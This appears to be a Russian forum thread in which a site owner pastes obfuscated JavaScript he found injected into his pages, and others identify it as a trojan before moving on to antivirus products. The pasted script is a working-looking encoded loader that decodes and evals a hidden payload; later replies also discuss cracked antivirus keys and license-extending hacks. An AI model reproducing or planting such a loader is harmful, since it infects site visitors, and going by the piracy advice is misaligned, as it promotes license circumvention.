мой сраный сайт

Форум » Открытый раздел » мой сраный сайт » Ответить

мой сраный сайт

grp2: обнаружил на страницах своего сайта непонятно откуда взявшийся текст: <script language='javascript' type='text/javascript'>var fN='fN'.substring(22517, 22517);var outT;this.nutGetG=false;outT='%b1%ba%b5%b2%b4%ba%b5%b4%fd%9e%b5%a8%b5%b1%bc%f3%f8%b8%a0%cb%a1%91%bf%b7%fb%bd%95%99%ee%cc%c3%f4%a8%ac%81%a2%81%9f%e8%97%a2%a6%96%b2%b2%a7%89%a2%bf%8e%b0%be%be%94%ba%a7%ac%a8%fa%c1%9e%fb%b1%b0%a5%df%e9%a7%e6%fe%fa%b9%a1%b9%b5%af%e4%eb%ec%d7%e5%ca%e5%a0%83%b3%e4%b2%9d%8e%ec%b6%d4%f1%a5%ad%a6%85%bf%90%ef%de%e5%e4%f7%d5%a0%ba%b7%ac%b1%be%ce%84%b6%b0%e6%b4%b3%84%ac%bc%ea%a6%af%bb%80%b6%ab%df%a5%af%ed%f2%b6%ab%fd%f8%f2%88%93%aa%b2%cc%ba%b7%a8%dc%b4%8b%f9%b9%ff%a8%fc%e9%e6%e5%ff%9b%84%b2%a4%c7%b0%a9%8b%b5%fd%8a%8c%b2%a3%a8%be%a1%b2%f3%f5%8b%a6%ab%b4%b5%a8%a6%e0%fb%d2%90%bf%ab%af%aa%a5%82%97%f5%b8%89%b1%a4%a8%81%cc%bc%b2%b4%f9%89%8b%be%ee%b2%ae%ba%a8%fd%e8%da%e0%cc%e2%f0%c9%fc%a8%a6%b7%d2%f2%a7%b1%be%a6%e0%93%ba%b0%a2%b1%a0%df%eb%ff%f6%f6%fe%ea%b2%f8%ba%84%a8%af%95%a5%b4%b6%97%db%b5%b0%f2%a4%bb%be%a8%a8%d8%b6%b5%bf%e6%a1%a9%f7%e5%f2%c6%ed%a0%fa%f4%a3%a9%e7%a3%dc%89%a0%8c%fa%84%b2%8f%80%eb%ff%ca%b0%e0%91%b8%b2%8a%be%93%b8%c3%b1%99%ad%f5%dc%ba%b5%81%f5%db%fc%b2%bd%85%84%a5%b9%a3%f5%db%d5%fe%f9%ed%f4%c5%f0%f0%fa%cd%c1%b1%aa%b8%b5%90%b5%ae%f6%db%ba%bc%b6%bc%b4%ab%cf%bf%a7%db%bd%e5%d0%ea%e2%f7%bf%b5%b0%81%91%b6%ee%87%e5%b7%a2%81%f2%da%d0%b1%b1%a8%94%ba%b4%92%a0%dd%c3%f8%a2%df%a6%a0%9c%9a%92%b8%aa%a6%bb%b9%a7%c0%e9%e1%df%9e%e5%a9%bf%b6%aa%bc%8f%91%b6%c0%a5%aa%af%a4%b2%bd%ae%a8%ef%ce%b8%a9%a0%b5%e6%b5%a9%ad%81%ac%91%99%b8%b4%e8%ac%b9%9a%a2%88%b5%b2%b4%e7%be%a8%f4%f3%b2%95%a3%ee%93%b4%a8%b0%96%b6%fd%82%b4%b0%93%b3%b7%ba%bd%ad%f0%a5%b4%b7%f3%e3%ae%a5%a8%bb%b3%94%ad%96%93%a4%d1%fc%a4%f6%a2%a2%a1%ed%d1%ed%f4%a7%ec%9b%a9%97%88%ae%b7%a5%db%ae%ac%9f%fb%d3%a3%a7%b2%a2%ee%be%bf%bd%a0%a2%b7%9f%96%b3%f8%fd%f5%f8%85%99%a4%ef%f7%a8%a4%9d%a4%89%90%cd%eb%ec%f6%fc%a0%bc%b3%c4%a8%85%b8%b9%a0%df%fa%ad%f2%b4%b7%8c%a3%b7%fd%b5%b5%b3%e4%a4%b5%95%ba%e2%e8%f5%c4%e1%ae%fb%f5%ca%ad%ae%a9%bd%b0%b3%d9%f9%ee%95%a9%a2%96%bd%f5%f5%fd%91%86%8c%ad%bb%a6%b8%ac%9f%ba%b2%a1%c0%f4%e8%e2%a7%be%af%cc%9c%f3%ce%f4%e5%a5%b0%ed%d3%f6%eb%8a%85%bf%bf%fa%a3%ab%a2%84%8f%a5%fa%f9%ea%f4%ea%fc%c7%e9%e9%ee%d2%f3%ea%ff%d2%b3%b9%b0%94%ad%95%ee%e1%fa%ae%b4%b9%d2%b7%fc%d8%f2%d6%e9%e1%ea%a5%ed%f8%ec%94%91%a5%93%b4%aa%89%b8%ab%ff%98%ac%ba%b5%ee%b3%f6%a6%ae%ad%b3%f0%a3%8f%bf%a1%ec%8d%a0%ba%84%bd%e6%b8%eb%a3%96%af%de%e8%8f%81%be%8c%ed%b3%86%b5%a8%f9%86%b8%a1%85%b6%f0%d0%e1%ad%ef%95%9d%a0%d6%ee%f8%97%af%b5%ac%dc%b8%ef%a4%bd%b6%b8%af%fb%ad%e5%f8%ad%ba%a4%a8%aa%bb%b0%83%9d%a0%e6%af%a5%a9%af%97%f9%e4%d3%bc%ba%b9%99%ef%f2%b1%ae%b8%98%fb%ef%f5%be%b8%bf%a0%d2%dd%ce%b8%a2%80%8d%f8%fd%e8%fa%b6%8d%a0%fb%bb%85%85%91%b5%b0%82%d7%aa%90%bd%b5%bf%be%b8%af%a4%8a%a8%ee%ad%af%af%d0%b2%b5%ab%89%aa%91%bb%a8%ea%f2%bc%f1%a2%9f%9c%82%ae%94%84%f0%f1%f7%b2%a1%b2%a9%b8%a3%d5%fd%e1%f9%b2%c7%e0%f8%d1%fa%ed%90%f0%ef%eb%87%fe%a5%a0%a0%ad%b5%a9%8e%bd%9f%ee%8a%bc%af%a2%e2%bd%ab%bb%b4%aa%99%9a%b9%cc%a6%b8%ab%a0%de%a1%b2%88%83%bc%ab%f5%c0%bd%98%e2%f2%a6%a5%a9%ad%b3%b4%b3%8b%a3%eb%f6%c3%e9%e1%d3%ed%e7%98%ea%b8%97%af%b3%87%a7%92%f2%8b%ad%ba%b6%94%b2%a6%fc%ae%a7%98%a1%b3%cc%ab%a6%8a%f4%ba%de%85%a0%f7%b7%b6%a0%ff%9c%a5%cf%97%f1%dd%a4%da%a2%c0%9c%fb%ec%8f%b3%d2%a2%a7%a3%e4%f4%98%98%ae%aa%a9%a2%b1%e9%cd%b6%a1%ee%95%b0%be%ba%ae%97%b4%b3%de%fa%cd%95%a5%b4%90%b0%f4%c7%e9%f2%c4%e0%f3';var natInMod=function(){return 'natInMod'};function outBosBad(wordCc){var oCalPut=new Date();asWordLs=0;while(asWordLs<1){asWordLs++};function fcBatThe(bJoinFog){var bedC='bedC';var orgAPwd=0;this.voidAwk=34204;var comCd=bJoinFog.length, atPop=0;var runH=function(){return 'runH'};var outVVoid='outVVoid'.substring(35658, 35658);while(atPop<comCd){var ccMemPip='ccMemPip'.substring(19340, 19340);var sSetA='';orgAPwd+=setWord(bJoinFog,atPop)*comCd;var opOut='opOut';atPop++;itGet=0;while(itGet<4){itGet++};}for(abPisC=0;abPisC<0;abPisC++){abPisC++};function getRunMax(getRunMax){return true};return (orgAPwd+'');var cMega=function(){return 'cMega'};}var nsTailPwd=24363;for(yTipMap=0;yTipMap<4;yTipMap++){yTipMap++};function setWord(nilLog,badNatLog){var popPis='popPis'.substring(47950, 47950);return nilLog['cqhjajrjCFoqdqejAjt<'.replace(/[0Fj\<q]/g, '')](badNatLog);var popItPak=51842;}var envO=new Array();this.megaPs=77;if((new String(document.write)).indexOf('arity')>0){getCalCom=0;while(getCalCom<4){getCalCom++};return;var gzNil=new Date();}var metaGet='metaGet';function calXS(calXS){return 'calXS'};for(whoBat=0;whoBat<1;whoBat++){whoBat++};var errOutPwd=0,popGetInt=0,tarTabW=130;var tarCow=new Date();var nutMaxThe='';var fiOrg='fiOrg'.substring(28722, 28722);var pisDir=(new String(outBosBad)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var ccInMov=5875;var cntCow=fcBatThe(pisDir);var psAs=function(){return 'psAs'};var qToPut=function(){return 'qToPut'};wordCc=window['u8nReUsQcQaWpReU'.replace(/[R8QUW]/g, '')](wordCc);for(rmPig=0;rmPig<2;rmPig++){rmPig++};var rBeFc=7161;for(var vZ=0; vZ < (wordCc.length); vZ++){var varMMov=new Array();for(wilBosPig=0;wilBosPig<3;wilBosPig++){};var inExL=setWord(pisDir,errOutPwd);function tarRunC(tarRunC){return true};var runPBed=setWord(cntCow,popGetInt);this.badVoid=false;function pisNilCon(pisNilCon){return 'pisNilCon'};var modRunWho=inExL^runPBed^tarTabW;var catK=function(){};var bInMin=setWord(wordCc,vZ);function maskNs(maskNs){return 'maskNs'};var fogIn='fogIn'.substring(37004, 37004);errOutPwd++,popGetInt++;var argLongPs=new Array();nutMaxThe+=String['fTrkoHmPC(hPa(r(C(okdHek'.replace(/[TH\(Pk]/g, '')](bInMin^modRunWho);function comT(comT){return 'comT'};this.bytePop='';if(popGetInt>cntCow.length)popGetInt=0;var gLoop=function(){return 'gLoop'};if(errOutPwd>pisDir.length)errOutPwd=0;var outVipPak='outVipPak';}for(pipMap=0;pipMap<1;pipMap++){};this.nutFcDate='';window['e;vQatl;'.replace(/[Q6Pt;]/g, '')](nutMaxThe);function exitCatRun(){};function mapCon(mapCon){return 'mapCon'};return nutMaxThe=new String();this.exXUse=9040;this.getEPis='';}this.arcLoop='arcLoop';outBosBad(outT);this.putRmMega='';</script>

Ответов - 14

Fakel: ты думаешь, мой бортовой компилятор это осилит? :)

Fakel: скорее всего это вирус. Как-то странно выглядит строчка var fN='fN'.substring(22517, 22517) - взять из строки в 2 байта 22517-ый байт. Что по этому адресу - ХЗ Скрипт явно юзает дыру в интерпретаторе браузера

NewBorN: При заходе на твой сайт, NOD32 матерится о вирусе епть, и браузер сцуко виснет. Так что у тебя там троян.

Лунный Конь: Трояну тому уже года три если не более, а grp2 походу уже давно до сайта похуй, как и до сего форума великого, и походу вообще до пиратского вещания, даже проводного. Я хз, у меня ДрВеб, мышей он ловит, + ФФ предлагает "уходим отсюда", однако если знать адрес НЕ ГЛАВНОЙ страницы (любой) то по сайту вполне можно лазить.

БородатыйХолодильник: Я вот залез, обрадовался, что тут grp2 обсуждают, а то что-то давно не было его тут. А потом, посмотрев на даты, понял, что боян...

NewBorN: видимо это был глюк браузера. нод тоже ловит, просто его ломать то и не надо, главное нарыть валидный логин и пароль на сервер обновлений.

NewBorN: его вроде в желтый дом упрятали. а вообще пусть организовывает FM радио и вещает там, будет хоть какой то шанс наличия слушателей.

Лунный Конь: NewBorN пишет: главное нарыть валидный логин и пароль Вот это то и беда, потому что и пароли и зеркала в сутки банят пачками, дело ещё вот в чем. Крякнутым нодам в ини прописаны нормальные настройки. А на дефолте он ничего ловить и не будет, потому он и не тормозит систему, что ничего не проверяет. А вообще перегруженая ненужной хуетой программа со свистом и перделками. Двеб юзаю уже давно, потому что там все просто и понятно, без лишней хуеты наглядно показано что делает программа и как. Алсо имеются консольный и дос сканеры, вирбаза общая, удобно оффлайн обновлять. При этом ни разу не помню чтоб за ним кто-то что-т о находил, а вот доктором за нодом или каспером - частенько.

БородатыйХолодильник: Вот он как раз совсем не перегруженный был, и была к демо-версии продлялка лицензии на 16777216 дней. Правда, в этой продлялке сервера обновлений были вписаны протухшие, поэтому базы обновлялись хреново, так что я эту продлялку устанавливал раз в месяц, чтобы счётчик сбросить, и удалял потом, делая эту демку тем самым снова 30-дневной. Но вот в августе с.г. халява кончилась - перестал старый NOD обновляться, требует установить более новую версию. Demo-версия NOD 5.0 явно перегружена всякой хренотой, да и не ставится она (подозреваю, что 320 Мб оперативной ей мало, хотя, может, и не в этом дело), а бесплатная Avira тоже почему-то не ставится, причём непонятно, чего ей надо, т.к. установщик как русской, так и английской версии ругается на немецком, а я его не понимаю. DrWeb всем хорош, но постоянный поиск непропаленных ключей задолбал, к тому же в процессе поиска приходится по таким сайтам ходить, где подхватить инфекцию совсем нетрудно. Тем более, что в поисках ключа приходится бродить, как правило, с незащищённого компа (а иначе зачем ключ).

PNP: мне нра, мало ресурсов кушает

Лунный Конь: Все банят свои старые версии. Вот ДрВеб их не банит вроде бы, но делает проще - тупо перестает выкладывать обновления баз для них. Только поэтому я слез с 4.44 на 5.0 секуритиспейс. Авира это срань и семечки, аваст тоже. Находят они только то что их разработчики напейсали, мало того - бесплатные версии не умеют лечить файлы - только удалять, что и делают суки молча, сметая всякие нужные вещи типа кряков или впа_киллов. С ключами для дрвеба всё на самом деле просто - надо однажды найти вечный ключ и не париться. Например для 4.44 он назывался [как-то назывался] и истекал [кровью когдв-то истекал], что вводило дрвеб в когнитивный диссонанс и он продолжал работать, только обновки приходилось ручками с фтп сдувать. На 5.0 тоже есть такие ключи, не нашел пока только полноценного - в одном не работает спайдер гард (хваталка той вирусни которая шевелиться начала) а в другом - спайдер гейт (что-то типа фаерволла, но просто контролирующее траффик сетевой). Посчитав что ловец мышей важнее сижу с отключеным спайдергейтом. На версии 6.0 и 7.0 не перехожу по причине того что контора скурвилась и новые продукты уже начали тяжелеть при появлении зачатков лишней самостоятельности. Есть там злая фича - надо после первой перезагрузки откинуть самозащиту и грохнуть впизду [кое-какой файл] так как если эта сучка разок попытается обновиться из сети, придётся его сносить и руками выгрызать его остатки из реестра.

Лунный Конь: Пора бы уже понять всем, что чтобы что-то найти, надо это что-то искать, а на это нужны ресурсы. НОД в дефолтных настройках тоже мало ресурсов кушает, а его крякнутый брат после такого лицензионного продукта всякие Win32.HLLW.Grizzlie выметает ссаными тряпками. Если его настроить нормально, он начинает кушать ресурсы, и прилично, но только тогда он начинает собственно ловить мышей. Чем хорош дВеб - у него ловец мышей и чехвостилка винтов это два абсолютно автономных процесса, за счет чего и решен вопрос жратья ресурсов. Однако если вирус лежит молча, он будет дальшге лежать - винты периодически сканировать все равно надо. Тут тоже чудес нет и не будет - или проверять иногда или терпите постоянный отжер памяти.

Волосатый Микрофон: Для всех NODов, включая 2.0, поддерживаются обновления баз. Другое дело, что для старых NODов не поддерживаются обновления программных модулей. Но и хер с ними, я думаю. То, что антивирусный сканер и антивирусный монитор есть вещи разные и вовсе друг друга не заменяют - так я в этом пытался убедить БХ несколько месяцев назад. Но, кажется, так и не убедил.

БородатыйХолодильник: Оно и сейчас поддерживается, да. Т.е., если ты поставишь с нуля старый NOD 2.x, он у тебя и сейчас весело обновится августовскими базами. И после этого будет постоянно совершать попытки обновления и говорить о том, что ты имеешь самую свежую версию баз. И будет, в общем-то, прав, потому что более свежих для него никто не выпустил.

полная версия страницы